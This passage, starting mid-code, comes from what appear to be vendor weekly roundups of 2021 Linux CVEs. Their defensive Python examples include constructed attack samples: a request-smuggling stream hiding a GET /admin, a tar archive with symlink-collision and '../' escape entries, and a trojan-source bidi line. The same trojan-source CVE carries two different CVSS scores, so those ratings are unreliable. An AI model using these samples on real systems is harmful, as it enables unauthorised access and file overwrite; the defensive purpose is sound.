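    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, t_mac.encode()):
        return False                      # forged or tampered
    if (t_list, t_user) != (listname, user):
        return False                      # issued for someone else
    if int(t_exp) <= (time.time() if now is None else now):
        return False                      # expired
    # The check Mailman was missing: the token's role must cover the action.
    return t_role in ROLE_RANK and ROLE_RANK[t_role] >= ROLE_RANK[required_role]


def demo(secret: bytes = b"constructed-demo-secret", now: float = 1_638_748_800.0) -> dict:
    member = mint_token(secret, "announce", "alice", "member", now)
    admin = mint_token(secret, "announce", "alice", "admin", now)
    # An attacker holding a member token rewrites the role field; the MAC no longer matches.
    tampered = base64.urlsafe_b64encode(
        base64.urlsafe_b64decode(member).replace(b"|member|", b"|admin|")).decode()
    return {
        "member token, member action": verify_token(secret, member, "announce", "alice", "member", now),
        "member token, admin action": verify_token(secret, member, "announce", "alice", "admin", now),
        "admin token, admin action": verify_token(secret, admin, "announce", "alice", "admin", now),
        "tampered role": verify_token(secret, tampered, "announce", "alice", "admin", now),
        "expired": verify_token(secret, member, "announce", "alice", "member", now + TTL_SECONDS + 1),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:30s} -> {'accepted' if ok else 'rejected'}")
```

The admin password form would call `verify_token(..., required_role="admin")`; a token minted on a member page fails that check even though it is otherwise valid, which is exactly the confusion the CVE describes.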

2. Xen PoD Operation denial of service

Severity: Important    CVSS Score: 8.8

x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, which provides a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages).

The implementation of some of these hypercalls for PoD does not enforce that the base page frame number (GFN) is suitably aligned for the specified order, yet some code involved in PoD handling assumes that it is. The affected operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain. In addition, handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708).

Syxscore Risk Alert

This vulnerability has a major risk: although it requires local access (a guest running on the host), it can be exploited with a low-complexity attack, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point: a crash triggered from one guest takes down the host and every other guest on it.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-28704, CVE-2021-28707, CVE-2021-28708

3. Insufficient symlink protection in Node.js ‘tar file’

Severity: Important    CVSS Score: 8.6

This is a flaw in the npm package “tar” (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories.

This flaw allows an untrusted ‘tar file’ to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems.

The highest threat from this vulnerability is to integrity and system availability.

Syxscore Risk Alert

This vulnerability has a major risk: although it requires local access and user interaction (a user extracting the untrusted archive), it can be exploited with a low-complexity attack and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-37701

4. Node.js ‘npmcli/arborist’ library vulnerability

Severity: Important    CVSS Score: 7.8

`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command-line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project’s `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system.

Syxscore Risk Alert

This vulnerability has a major risk: although it requires local access and user interaction (a user running an npm install), it can be exploited with a low-complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39135
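
Both the node-tar and the arborist issues above come down to a symlink being confused with a directory of the same name, so a pre-extraction check of the entry list is the natural defence. The example below is added here and is not node-tar’s or npm’s code: it flags a symlink and a directory whose names coincide once backslashes are treated as path separators and case is folded (for case-insensitive filesystems), any entry whose path passes through an earlier symlink, and any entry that escapes the destination. Python’s tarfile builds a constructed in-memory archive for the demo; the same check applies to any archive format.

```python
"""Validate archive entries before extraction: symlink/directory confusion (added example)."""
import io
import posixpath
import tarfile


def normalise(name: str) -> str:
    """Canonical form for collision checks: backslash is a separator on Windows,
    and case is folded because node_modules may live on a case-insensitive filesystem."""
    return posixpath.normpath(name.replace("\\", "/")).casefold()


def unsafe_entries(tar: tarfile.TarFile) -> list:
    """Return (entry name, reason) for every entry that must not be extracted."""
    problems = []
    dirs, symlinks = set(), {}          # normalised paths seen so far, in archive order
    for m in tar.getmembers():
        n = normalise(m.name)
        if n.startswith("/") or n == ".." or n.startswith("../"):
            problems.append((m.name, "escapes destination"))
            continue
        parts = n.split("/")
        through = next(("/".join(parts[:i]) for i in range(1, len(parts))
                        if "/".join(parts[:i]) in symlinks), None)
        if through is not None:
            problems.append((m.name, "path goes through symlink " + through))
            continue
        if m.issym():
            if n in dirs:
                problems.append((m.name, "symlink collides with directory"))
            symlinks[n] = m.linkname
        elif m.isdir():
            if n in symlinks:
                problems.append((m.name, "directory collides with symlink"))
            dirs.add(n)
    return problems


def build_demo_archive() -> bytes:
    """Constructed archive: a package directory, a symlink with the same name spelled
    with a backslash, a file underneath it, an escaping entry, and a benign file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        d = tarfile.TarInfo("node_modules/foo")
        d.type, d.mode = tarfile.DIRTYPE, 0o755
        tar.addfile(d)
        s = tarfile.TarInfo("node_modules\\foo")
        s.type, s.linkname = tarfile.SYMTYPE, "../outside"
        tar.addfile(s)
        for name, data in (("node_modules/foo/index.js", b"module.exports = 1;\n"),
                           ("../escape.txt", b"owned\n"),
                           ("README.md", b"benign\n")):
            f = tarfile.TarInfo(name)
            f.size = len(data)
            tar.addfile(f, io.BytesIO(data))
    return buf.getvalue()


def check_demo() -> list:
    with tarfile.open(fileobj=io.BytesIO(build_demo_archive()), mode="r") as tar:
        return unsafe_entries(tar)


if __name__ == "__main__":
    for name, reason in check_demo():
        print(f"{name!r}: {reason}")
```

The check is order-sensitive on purpose: an extractor creates entries in archive order, so a file that appears after a symlink to the same parent is the one that would be written through it. Reject the whole archive when the list is non-empty rather than skipping entries, since the remaining entries may depend on the ones removed.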

5. Incorrect parsing of HTTP transfer-encoding request header in Apache Tomcat

Severity: Medium       CVSS Score: 5.3

This is a flaw in Apache Tomcat. Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-33037
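The entry above names the flawed behaviour but not why ignoring a Transfer-Encoding header matters. The following Python model is an added example and not Tomcat code; it frames one constructed byte stream twice, once as a reverse proxy that honours chunked encoding and once as a backend that, like the vulnerable Tomcat, falls back to Content-Length for an HTTP/1.0 request. The disagreement is the smuggling condition: the proxy forwards one request, the backend sees two. The hostnames and paths are invented for the demonstration, and the `reject_ambiguous` option shows the strictest fix, refusing any request that carries both framing headers.

```python
def _read_chunked(data: bytes):
    """Decode a chunked body; return (body, bytes remaining after the final chunk)."""
    body = b""
    while True:
        eol = data.find(b"\r\n")
        size = int(data[:eol].split(b";")[0], 16)  # chunk extensions are ignored
        data = data[eol + 2:]
        if size == 0:                               # last chunk, then an empty trailer
            eol = data.find(b"\r\n")
            return body, data[eol + 2:]
        body += data[:size]
        data = data[size + 2:]                      # skip the CRLF after the chunk data


def split_requests(stream: bytes, ignore_te_for_http10: bool, reject_ambiguous: bool = False):
    """Split a byte stream into requests the way one hop would frame them.

    ignore_te_for_http10=True reproduces the flawed behaviour: a request whose
    request line says HTTP/1.0 is framed by Content-Length even when it carries
    Transfer-Encoding: chunked.  reject_ambiguous=True is the strict stance of
    refusing any request that carries both headers."""
    requests = []
    while stream:
        head_end = stream.find(b"\r\n\r\n")
        if head_end < 0:
            raise ValueError("incomplete header block")
        head, stream = stream[:head_end].decode("latin-1"), stream[head_end + 4:]
        request_line, *header_lines = head.split("\r\n")
        version = request_line.rsplit(" ", 1)[-1]
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        te = headers.get("transfer-encoding", "").lower()
        cl = headers.get("content-length")
        if reject_ambiguous and te and cl is not None:
            raise ValueError(f"{request_line}: both Transfer-Encoding and Content-Length")
        chunked = te.endswith("chunked") and not (version == "HTTP/1.0" and ignore_te_for_http10)
        if chunked:
            body, stream = _read_chunked(stream)
        else:
            n = int(cl or 0)
            body, stream = stream[:n], stream[n:]
        requests.append({"request_line": request_line, "body": body})
    return requests


# Constructed attack stream.  The outer Content-Length (4) covers exactly the
# chunk-size line "3d\r\n"; the smuggled request's Content-Length (7) covers the
# chunk trailer "\r\n0\r\n\r\n", so each hop finishes on a clean boundary.
SMUGGLED = (b"GET /admin HTTP/1.1\r\n"
            b"Host: app.example\r\n"
            b"Content-Length: 7\r\n\r\n")

ATTACK_STREAM = (b"POST /upload HTTP/1.0\r\n"
                 b"Host: app.example\r\n"
                 b"Content-Length: 4\r\n"
                 b"Transfer-Encoding: chunked\r\n\r\n"
                 + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n"
                 + b"0\r\n\r\n")


def demo() -> dict:
    """Frame the same bytes as the proxy, as the vulnerable backend, as a fixed
    backend, and as a strict backend; return what each one sees."""
    def lines(reqs):
        return [r["request_line"] for r in reqs]

    try:
        split_requests(ATTACK_STREAM, ignore_te_for_http10=False, reject_ambiguous=True)
        strict = "accepted"
    except ValueError:
        strict = "rejected"
    return {
        "proxy": lines(split_requests(ATTACK_STREAM, ignore_te_for_http10=False)),
        "vulnerable_backend": lines(split_requests(ATTACK_STREAM, ignore_te_for_http10=True)),
        "fixed_backend": lines(split_requests(ATTACK_STREAM, ignore_te_for_http10=False)),
        "strict_backend": strict,
    }


if __name__ == "__main__":
    for hop, seen in demo().items():
        print(f"{hop}: {seen}")
```

The proxy forwards a single POST whose chunked body happens to contain the text of a GET; the vulnerable backend reads four bytes of body and then parses that text as a second, unproxied request for /admin. Neither hop reports an error, which is what makes the desync useful to an attacker.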

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

By News

Linux Vulnerabilities of the Week: November 30, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. A heap buffer overflow in Redis (>2.6)

Severity: Important    CVSS Score: 8.8

Redis is an open-source, in-memory database that persists on disk. In affected versions, specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to overflow, because the checks for this condition were incomplete. This flaw allows a remote attacker who is able to run scripts to corrupt the heap and potentially achieve remote code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-32626

2. Memory corruption in WebKitGTK affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.8

This is a flaw in WebKitGTK. Processing maliciously crafted web content may lead to arbitrary code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system and user interaction (a user has to open the malicious web content in a WebKitGTK-based application), it can be exploited by an unprivileged attacker with a low-complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-30846

3. Incorrect principal selection in OpenJDK

Severity: Medium       CVSS Score: 6.8

This is a vulnerability in the Libraries component of Oracle Java SE (8u301, 11.0.12, 17) and Oracle GraalVM Enterprise Edition (20.3.3 and 21.2.0).

Exploiting this flaw, a low-privileged attacker with network access via Kerberos can compromise Java SE and Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker, and while the vulnerability is in Java SE and GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful exploitation can lead to unauthorized access to critical data or complete access to all data accessible to Java SE or GraalVM Enterprise Edition.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability carries a moderate risk: although it requires user interaction, it can be exploited over any network, with a low-complexity attack and low privileges. The changed scope reflects Oracle's note above that attacks may significantly impact products beyond Java SE and GraalVM themselves.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-35567

4. Limited sandbox escape via VFS syscalls in WebKitGTK

Severity: Medium       CVSS Score: 5.3

BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace.

The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined.

Syxscore Risk Alert

This vulnerability carries a moderate risk: although it requires local access (code already running inside the WebKit sandbox), it can be exploited with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42762

5. Server response processing flaw in Bind affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.3

This is a flaw in BIND 9.3.0 -> 9.11.35, 9.12.0 -> 9.16.21, and versions 9.9.3-S1 -> 9.11.35-S1 and 9.16.8-S1 -> 9.16.21-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.18 of the BIND 9.17 development branch.

The way the lame cache is designed makes it possible for its internal data structures to grow almost without bound. An attacker could abuse this caching mechanism to significantly degrade resolver performance.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-25219

||

By News

Linux Vulnerabilities of the Week: November 22, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. Out-of-bounds write to memory in FreeRDP

Severity: Important    CVSS Score: 8.8

This is a flaw in FreeRDP, a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license.

In affected versions, a malicious server can send specially crafted graphics updates to a connecting client and cause an out-of-bounds write in client memory. This could allow arbitrary code to be executed on the client system.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires user interaction (a user has to connect to the malicious server), it can be exploited over any network, with low complexity and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-41160

2. SVM-nested virtualization issue in KVM

Severity: Important    CVSS Score: 8.8

This is a flaw in the KVM’s AMD code for supporting SVM-nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the “int_ctl” field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data, or potential guest-to-host escape.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access (code running inside an L1 guest), it can be exploited with a low-complexity attack, low privileges, and without user interaction. The changed scope reflects that the flaw crosses the virtualization boundary: a guest can affect the host and every other guest running on it.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-3653

3. Possible trojan source attacks in the Unicode Specification (through 14.0)

Severity: Important    CVSS Score: 8.3

This is a flaw in the way Unicode standards are implemented in the context of development environments, which have specialized requirements for rendering text.

An attacker could use this to deceive a human reviewer by creating a malicious patch containing well-placed BiDi characters. The special handling and rendering of those characters can be then used in an attempt to hide unexpected and potentially dangerous behavior from the reviewer.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires a complex attack and user interaction (a reviewer has to read and approve the deceptive patch), it can be mounted over any network and without privileges. The changed scope reflects that the flaw sits in how editors and review tools render text, while the impact lands on whatever software is built from the deceived review.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-42574

4. A heap-based buffer overflow in vim

Severity: Important    CVSS Score: 7.8

This is a flaw in vim. By getting a user to open a specially crafted file, an attacker can trigger a heap-based buffer overflow, leading to a crash or to code execution with the privileges of the vim user.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system and user interaction (a user has to open the crafted file), it can be exploited with a low-complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3778

5. Remote crash in RSA decryption affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

This is a flaw in the way nettle’s RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3580

||

By News

Linux Vulnerabilities of the Week: November 15, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. Possible trojan source attacks in the Unicode Specification (through 14.0)

Severity: Critical         CVSS Score: 9.8

This is a flaw in the way Unicode standards are implemented in the context of development environments, which have specialized requirements for rendering text.

An attacker could use this to deceive a human reviewer by creating a malicious patch containing well-placed BiDi characters. The special handling and rendering of those characters can be then used in an attempt to hide unexpected and potentially dangerous behavior from the reviewer.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42574
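The trojan-source entries (this one and the November 22 listing of the same CVE) describe the mechanism without showing what a reviewer can actually check for. The following Python scanner is an added example, not code from the Unicode Consortium or from any compiler project; it reports every bidirectional control character in a source file, optionally only on lines where an override or isolate is opened and never closed, and renders the controls visibly so the logical order the compiler sees can be read by a human. The `SAMPLE` source is constructed for the demonstration in the pattern of the published attack: directionality controls opened inside a string literal so that the line displays in a different order than it is parsed.

```python
import unicodedata

# Unicode bidirectional formatting characters: the embeddings and overrides
# (U+202A, U+202B, U+202D, U+202E), their terminator PDF (U+202C), and the
# isolates (U+2066..U+2068) with their terminator PDI (U+2069).
BIDI_OPENERS = {"\u202a", "\u202b", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068"}
BIDI_CLOSERS = {"\u202c", "\u2069"}
BIDI_CONTROLS = BIDI_OPENERS | BIDI_CLOSERS


def scan_bidi(source: str, unpaired_only: bool = False) -> list:
    """Report every bidi control in source as (line, column, character name).

    With unpaired_only=True only lines whose openers are not all closed by the end
    of the line are reported.  That is the shape of the trojan-source trick: the
    override is left running so the rest of the line renders reordered."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        hits = [(col, ch) for col, ch in enumerate(line, 1) if ch in BIDI_CONTROLS]
        if not hits:
            continue
        depth = sum(1 if ch in BIDI_OPENERS else -1 for _, ch in hits)
        if unpaired_only and depth == 0:
            continue
        findings.extend((lineno, col, unicodedata.name(ch)) for col, ch in hits)
    return findings


def reveal(line: str) -> str:
    """Render bidi controls as visible markers, e.g. <RIGHT-TO-LEFT OVERRIDE>,
    leaving every other character in its logical (compiler) order."""
    return "".join(f"<{unicodedata.name(ch)}>" if ch in BIDI_CONTROLS else ch
                   for ch in line)


# Constructed sample: an RLO and two LRIs opened inside the string literal on
# line 2, with only one PDI closing, so the line stays reordered to the end.
SAMPLE = (
    "def check(access_level):\n"
    "    if access_level != 'user\u202e \u2066# Check if admin\u2069 \u2066':\n"
    "        return True\n"
    "    return False\n"
)


if __name__ == "__main__":
    for lineno, col, name in scan_bidi(SAMPLE, unpaired_only=True):
        print(f"line {lineno} col {col}: {name}")
    print(reveal(SAMPLE.splitlines()[1]))
```

Run it over the text of every patch before review; the unpaired-only mode is the lower-noise setting, since legitimate right-to-left text in comments normally closes its controls on the same line. This is the class of check that compilers and editors added after disclosure (GCC 12's -Wbidi-chars, for instance).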

2. A heap-based buffer overflow in vim

Severity: Important    CVSS Score: 7.8

This is a flaw in vim. By getting a user to open a specially crafted file, an attacker can trigger a heap-based buffer overflow, leading to a crash or to code execution with the privileges of the vim user.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system and user interaction (a user has to open the crafted file), it can be exploited by an unprivileged attacker with a low-complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3778

3. The Linux kernel (< 5.13.13) vulnerability

Severity: Important    CVSS Score: 7.8

The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system (and, as noted above, a process holding CAP_NET_ADMIN to feed input to the driver), it can be exploited with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42008

4. Memory overwrite in the Linux kernel (<5.14.6) with potential privilege escalation

Severity: Important    CVSS Score: 7.8

This is a flaw in aspeed_lpc_ctrl_mmap in drivers/soc/aspeed/aspeed-lpc-ctrl.c, the Aspeed Low Pin Count (LPC) Bus Controller driver in the Linux kernel.

A local attacker able to access the LPC control interface can exploit a missing sanity check to bypass the boundary check and map pages located outside the memory region reserved by the driver, potentially overwriting kernel memory and escalating privileges (fixed upstream in commit b49a0e69a7b1).

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system, it can be exploited with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42252

5. Heap buffer overflow in FireDTV media card driver affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 7.8

This is a heap-based buffer overflow flaw in the FireDTV media card driver of the Linux kernel (through 5.14.13), reached when a user calls the CA_SEND_MSG ioctl. By exploiting this vulnerability, a local user of the host machine can crash the system or escalate privileges.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability carries a major risk: although it requires local access to the system, it can be exploited with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42739
